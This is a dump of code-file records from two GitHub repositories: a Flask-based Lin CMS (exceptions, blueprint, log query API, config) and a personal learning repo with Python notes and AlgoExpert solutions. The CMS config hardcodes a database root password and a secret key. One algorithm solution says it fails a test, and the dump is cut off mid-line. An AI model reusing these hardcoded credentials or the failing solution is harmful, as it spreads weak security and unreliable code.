"text": "\"\"\"\n :copyright: © 2019 by the Lin team.\n :license: MIT, see LICENSE for more details.\n\"\"\"\n\nfrom lin.exception import APIException\n\n\nclass BookNotFound(APIException):\n code = 404 # http状态码\n msg = '没有找到相关图书' # 异常信息\n error_code = 80010 # 约定的异常码\n"
},
{
"alpha_fraction": 0.5846560597419739,
"alphanum_fraction": 0.6164020895957947,
"avg_line_length": 21.235294342041016,
"blob_id": "0ed6946da142d4a601911977793e9ade31229fb4",
"content_id": "4ade9dfef2146e6745c65390691e0c243678e891",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 379,
"license_type": "permissive",
"max_line_length": 48,
"num_lines": 17,
"path": "/app/api/v1/__init__.py",
"repo_name": "hello3306/lin-cms-flask",
"src_encoding": "UTF-8",
"text": "\"\"\"\n :copyright: © 2019 by the Lin team.\n :license: MIT, see LICENSE for more details.\n\"\"\"\n\nfrom flask import Blueprint\nfrom app.api.v1 import book, user\n\n\ndef create_v1():\n bp_v1 = Blueprint('v1', __name__)\n reds = [book, user]\n for red in reds:\n red.api.register(bp_v1)\n # book.book_api.register(bp_v1)\n # user.api.register(bp_v1)\n return bp_v1\n"
},
{
"alpha_fraction": 0.6541054844856262,
"alphanum_fraction": 0.657278835773468,
"avg_line_length": 32.61333465576172,
"blob_id": "2cc2de5d98fa425dc138605bf76d8a58110099ad",
"content_id": "812858267b7824c116a2ae5d437c34eddd0ef4a9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2694,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 75,
"path": "/app/api/cms/log.py",
"repo_name": "hello3306/lin-cms-flask",
"src_encoding": "UTF-8",
"text": "\"\"\"\n :copyright: © 2019 by the Lin team.\n :license: MIT, see LICENSE for more details.\n\"\"\"\n\nfrom flask import request, jsonify\nfrom sqlalchemy import text\nfrom lin.redprint import Redprint\nfrom lin.jwt import group_required\nfrom lin.exception import NotFound, ParameterException\nfrom lin.db import db\nfrom lin.util import paginate\nfrom lin.core import Log, route_meta\nfrom app.validators.forms import LogFindForm\n\nlog_api = Redprint('log')\n\n\n# 日志浏览(人员,时间),分页展示\n@log_api.route('/', methods=['GET'], strict_slashes=False)\n@route_meta(auth='查询所有日志', module='日志')\n@group_required\ndef get_logs():\n form = LogFindForm().validate_for_api()\n start, count = paginate()\n logs = db.session.query(Log).filter()\n if form.name.data:\n logs = logs.filter(Log.user_name == form.name.data)\n if form.start.data and form.end.data:\n logs = logs.filter(Log.time.between(form.start.data, form.end.data))\n total_nums = logs.count()\n logs = logs.order_by(text('time desc')).offset(start).limit(count).all()\n if logs is None or len(logs) < 1:\n raise NotFound(msg='没有找到相关日志')\n return jsonify({\n \"total_nums\": total_nums,\n \"collection\": logs\n })\n\n\n# 日志搜素(人员,时间)(内容), 分页展示\n@log_api.route('/search', methods=['GET'])\n@route_meta(auth='搜索日志', module='日志')\n@group_required\ndef get_user_logs():\n keyword = request.args.get('keyword', default=None, type=str)\n if keyword is None or '':\n raise ParameterException(msg='搜索关键字不可为空')\n start, count = paginate()\n form = LogFindForm().validate_for_api()\n logs = db.session.query(Log).filter(Log.message.like(f'%{keyword}%'))\n if form.name.data:\n logs = logs.filter(Log.user_name == form.name.data)\n if form.start.data and form.end.data:\n logs = logs.filter(Log._time.between(form.start.data, form.end.data))\n total_nums = logs.count()\n logs = logs.order_by(text('time desc')).offset(start).limit(count).all()\n if logs is None or len(logs) < 1:\n raise NotFound(msg='没有找到相关日志')\n return jsonify({\n \"total_nums\": total_nums,\n \"collection\": logs\n })\n\n\n@log_api.route('/users', methods=['GET'])\n@route_meta(auth='查询日志记录的用户', module='日志')\n@group_required\ndef get_users():\n start, count = paginate()\n user_names = db.session.query(Log.user_name).filter_by(soft=False) \\\n .group_by(text('user_name')).having(text('count(user_name) > 0')).offset(start) \\\n .limit(count).all()\n res = [user_name[0] for user_name in user_names]\n return jsonify(res)\n"
},
{
"alpha_fraction": 0.6019417643547058,
"alphanum_fraction": 0.6699029207229614,
"avg_line_length": 21.88888931274414,
"blob_id": "28c9d7d3d117999086a99bb13ebc2b9c1ea1554c",
"content_id": "a44a3554058b29d6c11e5bc690b1844179b1f4d5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 217,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 9,
"path": "/app/config/secure.py",
"repo_name": "hello3306/lin-cms-flask",
"src_encoding": "UTF-8",
"text": "\"\"\"\n :copyright: © 2019 by the Lin team.\n :license: MIT, see LICENSE for more details.\n\"\"\"\n\n# 安全性配置\nSQLALCHEMY_DATABASE_URI = 'mysql+cymysql://root:123456@localhost:3306/lin-cms'\n\nSECRET_KEY = '\\x88W\\xf09\\x91\\x07\\x98\\x89\\x87\\x96\\xa0A\\xc68\\xf9\\xecJJU\\x17\\xc5V\\xbe\\x8b\\xef\\xd7\\xd8\\xd3\\xe6\\x95*4'\n"
}
] | 11 |
c11cc/learning-process-record | https://github.com/c11cc/learning-process-record | e317d4e088e89745e0f06902b97fa481cb635ac4 | 6390eb42c5258c1bcb918f4c9ee4883d54c0da92 | 802323ac14113c63ff2f20f9db3fc655a146d583 | refs/heads/master | 2020-05-30T23:37:25.292676 | 2020-04-22T06:40:27 | 2020-04-22T06:40:27 | 190,020,195 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.4611596465110779,
"alphanum_fraction": 0.5008736848831177,
"avg_line_length": 17.192073822021484,
"blob_id": "b1c539498cea5e35527cfd33782377feaaeae960",
"content_id": "f2707032e6466aafe4675028f18a82f70a35f561",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 6295,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 328,
"path": "/python.md",
"repo_name": "c11cc/learning-process-record",
"src_encoding": "UTF-8",
"text": "### install python \r\n```\r\n./configure\r\nmake\r\nmake install\r\n```\r\n* environment<br>\r\n`export PATH=\"$PATH:/usr/local/bin/python\"`\r\n\r\n* install pythonwin<br> \r\n` pip install pywin32 `\r\n* with source<br>\r\n`pip install -i https://pypi.tuna.tsinghua.edu.cn/simple/ pywin32`\r\n\r\n* upgrade pip<br>\r\n` python -m pip install --upgrade.pip `\r\n\r\n* start coding <br>\r\n`#_*_coding:utf-8 _*_`\r\n* or<br>\r\n`#_*_coding:unicode _*_`\r\n\r\n* note<br>\r\n`start with #, or ''' for multilines.`\r\n\r\n### string <br>\r\n`\\: escape character `\r\n* r/R:<br>\r\n```\r\n>>>print(\"this is the first line with\\n\")\r\nthis is the first line with\r\n>>>print(r\"this is the second line with\\n\")\r\nthis is the second line with\\n\r\n```\r\n\r\n\r\n### number<br>\r\n```\r\n>>>a,b,c,d=1,1.1,true,1+1j\r\nTraceback (most recent call last):\r\n File \"<pyshell#6>\", line 1, in <module>\r\n a,b,c,d=1,1.1,true,1+1j\r\nNameError: name 'true' is not defined\r\n>>>a,b,c,d=1,1.1,True,1+1j\r\n>>>print(type(a,b,c,d))\r\nTraceback (most recent call last):\r\n File \"<pyshell#1>\", line 1, in <module>\r\n print(type(a,b,c,d))\r\nTypeError: type() takes 1 or 3 arguments\r\n>>>print(type(a),type(b),type(c),type(d))\r\n<class 'int'> <class 'float'> <class 'bool'> <class 'complex'>\r\n```\r\n\r\n### string<br>\r\n```\r\n>>>e,f=\"hello\",'hello'\r\n>>>e,f\r\n('hello','hello')\r\n>>>len(f)\r\n5\r\n>>> type(f)\r\n<class 'str'>\r\n```\r\n\r\n### list<br>\r\n```\r\n>>> a=[\"I\",\"like\",'that','boy','\\n']\r\n>>> a\r\n['I', 'like', 'that', 'boy', '\\n']\r\n>>> type(a)\r\n<type 'list'>\r\n>>> print(a)\r\n['I', 'like', 'that', 'boy', '\\n']\r\n>>> a +['very much']\r\n['I', 'like', 'that', 'boy', '\\n', 'very much']\r\n>>> a[4]=[] #list can be edited\r\n>>> a\r\n['I', 'like', 'that', 'boy', []]\r\n>>> a[4]=''\r\n>>> a\r\n['I', 'like', 'that', 'boy', '']\r\n>>> a=[\"I\",\"like\",'that','boy','\\n']\r\n>>> a.remove(\"\\n\")\r\n>>> a\r\n['I', 'like', 'that', 'boy']\r\n>>> a.append(\"very much\")\r\n>>> a\r\n['I', 'like', 'that', 'boy', 'very much']\r\n>>> a.extend(\"very muach\")\r\n>>> a\r\n['I', 'like', 'that', 'boy', 'very much', 'v', 'e', 'r', 'y', ' ', 'm', 'u', 'a', 'c', 'h']\r\n>>> a.pop(len(a)-1)\r\n'h'\r\n>>>del a[5:len(a)]\r\n>>> a\r\n['I', 'like', 'that', 'boy', 'very much']\r\n>>> b=a[1:5]\r\n>>> b\r\n['like', 'that', 'boy', 'very much']\r\n>>> b.reverse()\r\n>>> b\r\n['very much', 'boy', 'that', 'like']\r\n>>> b.append('I')\r\n>>> b\r\n['very much', 'boy', 'that', 'like', 'I']\r\n>>> b.reverse()\r\n>>> b\r\n['I', 'like', 'that', 'boy', 'very much']\r\n>>> b.sort()\r\n>>> b\r\n['I', 'boy', 'like', 'that', 'very much']\r\n>>> b.copy()\r\n['I', 'boy', 'like', 'that', 'very much']\r\n>>> b[:]\r\n['I', 'boy', 'like', 'that', 'very much']\r\n>>> b.clear()\r\n>>> b\r\n[]\r\n```\r\n\r\n### Tuple\r\n```\r\n>>> b=(\"i\",'like','that','boy','\\n')\r\n>>> b\r\n('i', 'like', 'that', 'boy', '\\n')\r\n>>> b[4]\r\n'\\n'\r\n>>> print(b,type(b),len(b))\r\n('i', 'like', 'that', 'boy', '\\n') <class 'tuple'> 5\r\n>>> b[4]=() #Tuple cannot be edited\r\nTraceback (most recent call last):\r\n File \"<pyshell#16>\", line 1, in <module>\r\n b[4]=()\r\nTypeError: 'tuple' object does not support item assignment\r\n>>> b[4]=[]\r\nTraceback (most recent call last):\r\n File \"<pyshell#17>\", line 1, in <module>\r\n b[4]=[]\r\nTypeError: 'tuple' object does not support item assignment\r\n>>> c=('one')\r\n>>> print(b+c)\r\nTraceback (most recent call last):\r\n File \"<pyshell#24>\", line 1, in <module>\r\n print(b+c)\r\nTypeError: can only concatenate tuple (not \"str\") to tuple\r\n>>> b=('one','boy')\r\n>>> c=('one','man')\r\n>>> b+c\r\n('one', 'boy', 'one', 'man')\r\n>>> bb=('becomes',)\r\n>>> b+bb\r\n('one', 'boy', 'becomes')\r\n>>> b+bb+c\r\n('one', 'boy', 'becomes', 'one', 'man')\r\n>>> bc=('become')\r\n>>> print(type(bb),type(bc))\r\n<class 'tuple'> <class 'str'>\r\n>>> d,e=('i','have'),('tried','this')\r\n>>> d+e\r\n('i', 'have', 'tried', 'this')\r\n>>> a=['A','B','C']\r\n>>> b=tuple(a)\r\n>>> print(type(a),type(b))\r\n<class 'list'> <class 'tuple'>\r\n>>> a\r\n['A', 'B', 'C']\r\n>>> b\r\n('A', 'B', 'C') \r\n```\r\n\r\n\r\n### set,like hash key in perl\r\n```\r\n>>> student={'Tom','Jerry','Fred','Jerry'}\r\n>>> student\r\n{'Fred', 'Tom', 'Jerry'}\r\n>>> 'Tom' in student #like exists in perl\r\nTrue\r\n>>> teacher=set('ABCD')\r\n>>> teacher\r\n{'A', 'B', 'D', 'C'}\r\n>>> leader=set('CDEF')\r\n>>> teacher-leader\r\n{'A', 'B'}\r\n>>> teacher|leader\r\n{'D', 'F', 'A', 'B', 'E', 'C'}\r\n>>> teacher&leader\r\n{'D', 'C'}\r\n>>> teacher^leader\r\n{'F', 'A', 'B', 'E'}\r\n```\r\n\r\n### dictionary, like hash in perl\r\n```\r\n>>> hash={'Tom':'A','Jerry':'B'}# declare method1 \r\n>>> hash\r\n{'Tom': 'A', 'Jerry': 'B'}\r\n>>> hash['Tom']\r\n'A'\r\n>>> hash['Kim']='A'\r\n>>> hash\r\n{'Tom': 'A', 'Jerry': 'B', 'Kim': 'A'}\r\n>>> del hash['Jerry']\r\n>>> hash\r\n{'Tom': 'A', 'Kim': 'A'}\r\n>>> hash.keys()\r\ndict_keys(['Tom', 'Kim'])\r\n>>> hash.values()\r\ndict_values(['A', 'A'])\r\n>>> sorted(hash.keys)\r\nTraceback (most recent call last):\r\n File \"<pyshell#64>\", line 1, in <module>\r\n sorted(hash.keys)\r\nTypeError: 'builtin_function_or_method' object is not iterable\r\n>>> sorted(hash.keys())\r\n['Kim', 'Tom']\r\n>>> hashn=dict([('Tom','A'),('Jerry','B'),('Kim','A')])#declare method2\r\n>>> hashn\r\n{'Tom': 'A', 'Jerry': 'B', 'Kim': 'A'}\r\n>>> hashm=dict(Tom=A,Jerry=B,Kim=A)\r\nTraceback (most recent call last):\r\n File \"<pyshell#71>\", line 1, in <module>\r\n hashm=dict(Tom=A,Jerry=B,Kim=A)\r\nNameError: name 'A' is not defined\r\n>>> hashm=dict(Tom='A',Jerry='B',Kim='A')#declare method3\r\n>>> hashm\r\n{'Tom': 'A', 'Jerry': 'B', 'Kim': 'A'}\r\n```\r\n\r\n### calculation\r\n```\r\n>>> 5+4\r\n9\r\n>>> 5-4\r\n1\r\n>>> 5/4\r\n1.25\r\n>>> 5*4\r\n20\r\n>>> 5//4\r\n1\r\n>>> 5%4\r\n1\r\n>>> 6%4\r\n2\r\n>>> 5^4\r\n1\r\n>>> 2**5\r\n32\r\n>>> 4/2\r\n2.0\r\n>>> 4//2\r\n2\r\n>>> pow(27,1/3)\r\n3.0\r\n>>> pow(8,1/3)\r\n2.0\r\n>>> pow(-2,1/2)\r\n(8.659560562354934e-17+1.4142135623730951j)\r\n>>> import cmath\r\n>>> cmath.sqrt(5)\r\n(2.23606797749979+0j)\r\n>>> cmath.sqrt(-1)\r\n1j\r\n>>> cmath.sqrt(-5)\r\n2.23606797749979j\r\n>>> pow(-5,1/2)\r\n(1.3691967456605067e-16+2.23606797749979j) \r\n```\r\n\r\n### string and operator\r\n```\r\n>>>print (\"str\"+'ing','operator'*2)\r\nstring operatoroperator\r\n>>>e,f=\"hello\",'hello'\r\n>>> print (e[0]+e[3])\r\nhl\r\n>>> print(e[0:3])\r\nhel\r\n>>> print(e[-1:-3])\r\n\r\n>>> print(e[-3:-1])\r\nll \r\n>>> print(e[-5:-3])\r\nhe\r\n```\r\n\r\n### working in shell\r\n```\r\n>>> b=0\r\n>>> while(b<9):\r\n\tprint(b)\r\n\tb=b+1\r\n\r\n\t\r\n0\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n\r\n>>> if(b<10):\r\n\tprint(b)\r\n\r\n\t\r\n9\r\n>>> if(b<10)\r\nSyntaxError: invalid syntax\r\n\r\n\r\n#for\r\n>>> for i in range(5,9):\r\n\tprint(i)\r\n\r\n\t\r\n5\r\n6\r\n7\r\n8\r\n```\r\n\r\n* break, perl last\r\n* countinue, perl next\r\n* pass, do nothing waiting for crtl+C;\r\n"
},
{
"alpha_fraction": 0.8214285969734192,
"alphanum_fraction": 0.8214285969734192,
"avg_line_length": 13,
"blob_id": "177828c3c9d6d1d55fa6adaf89a5889f5ac070f1",
"content_id": "269a9418677f4b07420cd76d1c7f5d6affe28d39",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 28,
"license_type": "no_license",
"max_line_length": 16,
"num_lines": 2,
"path": "/README.md",
"repo_name": "c11cc/learning-process-record",
"src_encoding": "UTF-8",
"text": "# learning\nlearning process\n"
},
{
"alpha_fraction": 0.5954545736312866,
"alphanum_fraction": 0.6318181753158569,
"avg_line_length": 20.200000762939453,
"blob_id": "da4d2362a33141ea10617830bdf10b5aae48ec8a",
"content_id": "6fae58e1145b08a674160a9e63c989a74ab4f3da",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 220,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 10,
"path": "/fibonacci_number.py",
"repo_name": "c11cc/learning-process-record",
"src_encoding": "UTF-8",
"text": "# print 10 fibonacci number\r\n# define before calling, this is different from Perl\r\n\r\ndef calculation(m,n,counts):\r\n while(counts<10):\r\n counts+=1\r\n m,n=n,m+n\r\n print(\"%d:%d\" %(counts,m))\r\n \r\ncalculation(0,1,0)"
}
] | 3 |
peterbarla/AlgoExpertExercises | https://github.com/peterbarla/AlgoExpertExercises | 8352d77f617a630b0df430cf41e14a97c55a9c7c | d5fc366593185169e0ad8fe2739d85ef5ff6cb5c | 971ac46f7565277358b3597fb9b2157cf9d1ed58 | refs/heads/master | 2023-02-18T23:05:53.012687 | 2021-01-21T22:43:34 | 2021-01-21T22:43:34 | 286,207,976 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6157462000846863,
"alphanum_fraction": 0.640423059463501,
"avg_line_length": 34.5,
"blob_id": "87d83b347cae151b79814f67587ab1c292e70f3d",
"content_id": "ddbe1dac73040d196ec3f4d885612690f9544cbb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 851,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 24,
"path": "/DynamicProgramming/MaxProfitWithKTransactions/solution_1.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(nk) time | O(n) space where n is the length of prices and k is the number of transactions\ndef maxProfitWithKTransactions(prices, k):\n if k < 1 or len(prices) < 2: return 0\n firstRow = [0 for i in range(len(prices))]\n secondRow = []\n for _ in range(k):\n secondRow = [0 for k in range(len(prices))]\n for j in range(1, len(prices)):\n maxProfitWithLessTransactions = getMaxProfit(firstRow, prices, j)\n secondRow[j] = max(secondRow[j - 1], prices[j] + maxProfitWithLessTransactions)\n firstRow = secondRow[0:]\n\n return secondRow[-1]\n\ndef getMaxProfit(firstRow, prices, j):\n maxProfit = float('-inf')\n for i in range(0, j):\n maxProfit = max(maxProfit, firstRow[i] - prices[i])\n return maxProfit\n\nprices = [5, 11, 3, 50, 60, 90]\nk = 2\n\nprint(maxProfitWithKTransactions(prices, k))"
},
{
"alpha_fraction": 0.5841924548149109,
"alphanum_fraction": 0.5979381203651428,
"avg_line_length": 21.461538314819336,
"blob_id": "0effbc86e3619fb90242208d03e81b55754edf78",
"content_id": "0bb910af25bae0f67b7effef5b3bb63c6c0489a7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 291,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 13,
"path": "/ArraysCategory/ArrayOfProducts/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n^2) time | O(n) space\ndef arrayOfProducts(array):\n result = []\n \n for i in range(len(array)):\n result.append(product(array[0:i] + array[i + 1: len(array)]))\n return result\n \ndef product(array: list) -> int:\n\tprod = 1\n\tfor elem in array:\n\t\tprod *= elem\n\treturn prod"
},
{
"alpha_fraction": 0.5291005373001099,
"alphanum_fraction": 0.5784832239151001,
"avg_line_length": 27.399999618530273,
"blob_id": "9ac097390d6819daffae44943fae53f89cdceec7",
"content_id": "7ffd50a89364a36d719bccc57b8acee566e64dc4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 567,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 20,
"path": "/DynamicProgramming/MaxSubsetSumNoAdjacent/solution_1.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# o(n) time | O(1) space\ndef maxSubsetSumNoAdjacent(array):\n if len(array) == 0: return 0\n elif len(array) == 1: return array[0]\n elif len(array) == 2: return max(array[0], array[1])\n before_last_max = array[0]\n last_max = max(array[0], array[1])\n final_max = last_max\n\n \n i = 2\n while i < len(array):\n final_max = max(last_max, before_last_max + array[i])\n before_last_max = last_max\n last_max = final_max\n i +=1\n \n return final_max\narr = [75, 105, 120, 75, 90, 135]\nprint(maxSubsetSumNoAdjacent(arr))"
},
{
"alpha_fraction": 0.6717391014099121,
"alphanum_fraction": 0.686956524848938,
"avg_line_length": 31.928571701049805,
"blob_id": "7166be2763ef72255e65f22748de71181696ab57",
"content_id": "67d7c0708a193ddf75e93c5caa63a6c98984cfa4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 460,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 14,
"path": "/Searching/BinarySearch/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(log(n)) time | O(1) space\ndef binarySearch(array, target):\n\treturn searchBinary(array, target, 0, len(array) - 1)\n\t\ndef searchBinary(array: list, target: int, left: int, right: int) -> int:\n\tif left > right: return -1\n\tmid = (left + right) // 2\n\tpotentialElem = array[mid]\n\t\n\tif target == potentialElem:\n\t\treturn mid\n\telif target > potentialElem:\n\t\treturn searchBinary(array, target, mid + 1, right)\n\telse: return searchBinary(array, target, left, mid - 1)"
},
{
"alpha_fraction": 0.6010362505912781,
"alphanum_fraction": 0.6096718311309814,
"avg_line_length": 37.66666793823242,
"blob_id": "a410998f3b10684bec46a6b74af820df1f14d694",
"content_id": "b2a6b8b09424629113d44a9d658cbedc34aaf211",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 579,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 15,
"path": "/Strings/CaesarCipherEncryptor/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n) time | O(n) space\ndef caesarCipherEncryptor(string, key):\n abc = 'abcdefghijklmnopqrstuvwxyz'\n new_string = []\n for i in range(len(string)):\n if abc.index(string[i]) + key > len(abc) - 1:\n how_many_times = (abc.index(string[i]) + key) //len(abc)\n index = (abc.index(string[i]) + key) - how_many_times*len(abc) - 1\n new_string.append(abc[index + 1])\n else: new_string.append(abc[abc.index(string[i]) + key])\n return ''.join(new_string)\n\nstring = 'ovmqkwtujqmfkao'\nkey = 52\nprint(caesarCipherEncryptor(string, key))"
},
{
"alpha_fraction": 0.633281946182251,
"alphanum_fraction": 0.6671802997589111,
"avg_line_length": 29.952381134033203,
"blob_id": "1945ca55f9e36a5f0f514085877b366ba2bd56c7",
"content_id": "5d711b7fb937e058bf8dea8dd20391f307d0a675",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 649,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 21,
"path": "/DynamicProgramming/WaterArea/solution_1.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "def waterArea(heights):\n\tif len(heights) <= 2: return 0\n\tleft_index = 0\n\tright_index = len(heights) - 1\n\tleft_most_height = heights[left_index]\n\tright_most_height = heights[right_index]\n\tsumm = 0\n\twhile left_index < right_index:\n\t\tif heights[left_index] < heights[right_index]:\n\t\t\tleft_index += 1\n\t\t\tleft_most_height = max(left_most_height, heights[left_index])\n\t\t\tsumm += left_most_height - heights[left_index]\n\t\telse:\n\t\t\tright_index -= 1\n\t\t\tright_most_height = max(right_most_height, heights[right_index])\n\t\t\tsumm += right_most_height - heights[right_index]\n\t\t\t\n\treturn summ\n\narr = [0, 8, 0, 0, 5, 0, 0, 10, 0, 0, 1, 1, 0, 3]\nprint(waterArea(arr))"
},
{
"alpha_fraction": 0.5931034684181213,
"alphanum_fraction": 0.617241382598877,
"avg_line_length": 31.25,
"blob_id": "47bc75f0f97d288aa9941672a2312c9411210f7d",
"content_id": "40471fc7f05e073d009d1d787b549605bd225a31",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1160,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 36,
"path": "/DynamicProgramming/LongestIncreasingSubsequence/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n^2) time | O(n) space\ndef longestIncreasingSubsequence(array):\n lengths = [0 for i in range(len(array))]\n lengths[0] = 1\n\n sequences = [0 for i in range(len(array))]\n sequences[0] = None\n for i in range(1, len(array)):\n getFirstSmallerBeforeNumber(i, array, lengths, sequences)\n result = buildSequence(lengths, sequences, array)\n result.reverse()\n return result\n \ndef getFirstSmallerBeforeNumber(index, array, lengths, sequences):\n found = False\n for i in range(0, index):\n if array[i] < array[index]:\n if lengths[index] < lengths[i] + 1:\n lengths[index] = lengths[i] + 1\n sequences[index] = i\n found = True\n if not found:\n lengths[index] = 1\n sequences[index] = None\n\ndef buildSequence(lengths, sequences, array):\n result = []\n startingIndex = lengths.index(max(lengths))\n while startingIndex != None:\n result.append(array[startingIndex])\n tmp = startingIndex\n startingIndex = sequences[tmp]\n return result\n\narray = [5, 7, -24, 12, 10, 2, 3, 2, 12, 5, 6, 35]\nprint(longestIncreasingSubsequence(array))"
},
{
"alpha_fraction": 0.44736841320991516,
"alphanum_fraction": 0.4736842215061188,
"avg_line_length": 20.785715103149414,
"blob_id": "0d2f500652a8187d00eadca515f683436f58a269",
"content_id": "1680b2b1b458b1ed52c101b63d1bbd983539f9cb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 304,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 14,
"path": "/Recursion/NthFibonacci/my_solution_2.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n) time | O(1) space\ndef getNthFib(n):\n first = 0\n second = 1\n number = 0\n if n == 1: return first\n elif n == 2: return second\n else:\n while n > 2:\n number = first + second\n first = second\n second = number\n n -= 1\n return number"
},
{
"alpha_fraction": 0.518430233001709,
"alphanum_fraction": 0.563234806060791,
"avg_line_length": 46.33082580566406,
"blob_id": "46a9a862501ac6e48b6253deeb5d8309a04e2007",
"content_id": "e0a363cff6edd8bbcdc9cf60c6e8ecec4bc365aa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6294,
"license_type": "no_license",
"max_line_length": 231,
"num_lines": 133,
"path": "/ArraysCategory/CalendarMatching/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# not passing 1 test...:))))\ndef calendarMatching(calendar1: list, bounds1: list, calendar2: list, bounds2: list, meeting_Duration: int)-> list:\n calendar = []\n i = 0\n j = 0\n last_appended_index = -1\n while i < len(calendar1) and j < len(calendar2):\n print(calendar)\n if len(calendar) == 0:\n start_time = minutes_to_military_time(min(military_time_to_minutes(calendar1[i][0]), military_time_to_minutes(calendar2[j][0])))\n end_time = minutes_to_military_time(max(military_time_to_minutes(calendar1[i][1]), military_time_to_minutes(calendar2[j][1])))\n if military_time_to_minutes(calendar1[0][1]) >= military_time_to_minutes(calendar2[0][0]):\n calendar.append([start_time, end_time])\n last_appended_index += 1\n else:\n calendar.append(calendar1[i])\n calendar.append(calendar2[j])\n last_appended_index += 2\n i += 1\n j += 1\n else:\n start1 = military_time_to_minutes(calendar1[i][0])\n end1 = military_time_to_minutes(calendar1[i][1])\n start2 = military_time_to_minutes(calendar2[j][0])\n end2 = military_time_to_minutes(calendar2[j][1])\n\n prev_end = military_time_to_minutes(calendar[last_appended_index][1])\n prev_start = military_time_to_minutes(calendar[last_appended_index][0])\n\n index_for_check = -1\n\n if start1 <= start2: index_for_check = 0\n else: index_for_check = 1\n\n changed = False\n\n if index_for_check == 0:\n if start1 <= prev_end:\n if start1 < prev_start:\n calendar[last_appended_index][0] = minutes_to_military_time(start1)\n if end1 >= start2:\n calendar[last_appended_index][1] = minutes_to_military_time(max(end1, end2))\n elif end1 >= prev_end:\n calendar[last_appended_index][1] = minutes_to_military_time(end1)\n calendar.append(calendar2[j])\n last_appended_index += 1\n else: \n #calendar[last_appended_index][1] = minutes_to_military_time(end1)\n calendar.append(calendar2[j])\n last_appended_index += 1\n changed = True\n else:\n if start2 <= prev_end:\n if start2 < prev_start:\n calendar[last_appended_index][0] = minutes_to_military_time(start2)\n if end2 >= start1:\n calendar[last_appended_index][1] = minutes_to_military_time(max(end1, end2))\n elif end2 >= prev_end:\n calendar[last_appended_index][1] = minutes_to_military_time(end2)\n calendar.append(calendar1[i])\n last_appended_index += 1\n else: \n #calendar[last_appended_index][1] = minutes_to_military_time(end2)\n calendar.append(calendar1[i])\n last_appended_index += 1\n changed = True\n\n if not changed:\n start_time = minutes_to_military_time(min(military_time_to_minutes(calendar1[i][0]), military_time_to_minutes(calendar2[j][0])))\n end_time = minutes_to_military_time(max(military_time_to_minutes(calendar1[i][1]), military_time_to_minutes(calendar2[j][1])))\n calendar.append([start_time, end_time])\n last_appended_index += 1\n\n i += 1\n j += 1\n\n for index in range(i, len(calendar1)):\n if military_time_to_minutes(calendar[last_appended_index][1]) >= military_time_to_minutes(calendar1[index][1]):\n continue\n calendar.append(calendar1[index])\n for index in range(j, len(calendar2)):\n if military_time_to_minutes(calendar[last_appended_index][1]) >= military_time_to_minutes(calendar2[index][1]):\n continue\n calendar.append(calendar2[index])\n\n if len(calendar1) != 0 and len(calendar2) != 0:\n free_start = minutes_to_military_time(max(military_time_to_minutes(bounds1[0]), military_time_to_minutes(bounds2[0])))\n free_end = minutes_to_military_time(min(military_time_to_minutes(bounds1[1]), military_time_to_minutes(bounds2[1])))\n free_bounds = [free_start, free_end]\n\n free_intervalls = []\n if military_time_to_minutes(calendar[0][0]) - military_time_to_minutes(free_bounds[0]) >= meeting_Duration:\n free_intervalls.append([free_bounds[0], calendar[0][0]])\n\n for i in range(len(calendar) - 1):\n if military_time_to_minutes(calendar[i + 1][0]) - military_time_to_minutes(calendar[i][1]) >= meeting_Duration:\n free_intervalls.append([calendar[i][1], calendar[i + 1][0]])\n\n if 